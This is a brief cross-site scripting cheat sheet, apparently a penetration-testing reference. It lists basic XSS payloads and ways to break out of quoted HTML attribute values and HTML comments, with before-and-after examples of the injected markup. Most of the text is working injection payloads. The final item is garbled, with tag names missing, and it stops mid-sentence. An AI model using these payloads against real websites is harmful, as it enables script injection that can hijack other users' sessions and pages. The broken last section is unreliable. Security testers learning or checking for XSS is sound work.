XSS Cheat Sheet (Basic)

1. Basic payload

<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>

2. Add ' or " to escape the payload from value of an HTML tag

"><script>alert(1)</script>
'><script>alert(1)</script> 

• Example source code

<input id="keyword" type="text" name="q" value="REFLECTED_HERE">

• After input the payload

<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>

3. Add --> to escape the payload if input lands in HTML comments.

--><script>alert(1)</script>

• Example source code

<!-- REFLECTED_HERE --> 

• After input the payload

<!-- --><script>alert(1)</script> -->

4. Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside